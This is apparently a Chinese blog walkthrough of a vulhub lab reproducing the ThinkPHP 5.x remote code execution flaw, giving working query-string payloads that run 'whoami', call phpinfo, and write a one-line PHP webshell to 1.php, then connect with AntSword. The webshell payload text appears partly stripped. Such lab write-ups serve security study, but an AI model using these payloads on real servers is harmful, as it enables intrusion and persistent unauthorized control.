Thinkphp5x远程命令执行 靶场攻略

你不要在理我了2024-09-27 17:51

环境配置

靶场:vulhub/thinkphp/5-rce

docker-compose up -d #启动环境

漏洞复现

1.访问靶场:http://172.16.1.198:8080/

2.远程命令执⾏

POC:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]

\]=whoami ![](https://i-blog.csdnimg.cn/direct/16753b4fd3bb4544bdb52b2109a6e6f3.png) #### 3.远程代码执行 POC: ?s=/Index/\\think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=phpinfo\&vars\[ 1\]\[\]=-1 ![](https://i-blog.csdnimg.cn/direct/6a91a4e3c31e4e63a88d3ab5d65d24cf.png) #### 4.写入一句话木马到根目录下的1.php POC: ?s=index/think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=system\&vars\[1\]\[\]=echo "\" \> 1.php ![](https://i-blog.csdnimg.cn/direct/732b49aa73e14b64bf6827488e1fe6d8.png) #### 5.蚁剑连接 ![](https://i-blog.csdnimg.cn/direct/400f12233e0e401290c55af68f48328a.png)

相关推荐
朴素先生在进步11 分钟前
Memory-Based AI Responder: Principles, Skills, and Workflows
java
攒了一袋星辰35 分钟前
Spring是如何实现scope作用域支持
java·后端·spring
小黑屋说YYDS1 小时前
Spring Validation校验
java·后端·spring
接着奏乐接着舞1 小时前
spring boot 注解 @bean
spring boot·后端·python
悟能不能悟1 小时前
Spring Boot多数据源配置的陷阱与终极解决方案
java·数据库·spring boot
fashia2 小时前
Java转Go日记(四十四):Sql构建
开发语言·后端·golang·go
努力的搬砖人.2 小时前
Linux在防火墙中添加开放端口
java·linux·docker
源码云商2 小时前
阿博图书馆管理系统 Java+Spring Boot+MySQL 实战项目分享
java·spring boot·mysql
程序员Bears2 小时前
Flask项目实践:构建功能完善的博客系统(含评论与标签功能)
后端·python·flask
热门推荐
01从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑02KGG转MP3工具|非KGM文件|解密音频03YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】04【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!05组基轨迹建模 GBTM的介绍与实现(Stata 或 R)06DeepSeek各版本说明与优缺点分析07VMware虚拟机安装Win7专业版保姆级教程(附镜像包)08YOLOv5改进 | 添加CA注意力机制 + 增加预测层 + 更换损失函数之GIoU09Coze扣子平台完整体验和实践(附国内和国际版对比)10YOLOV11改进1-检测头篇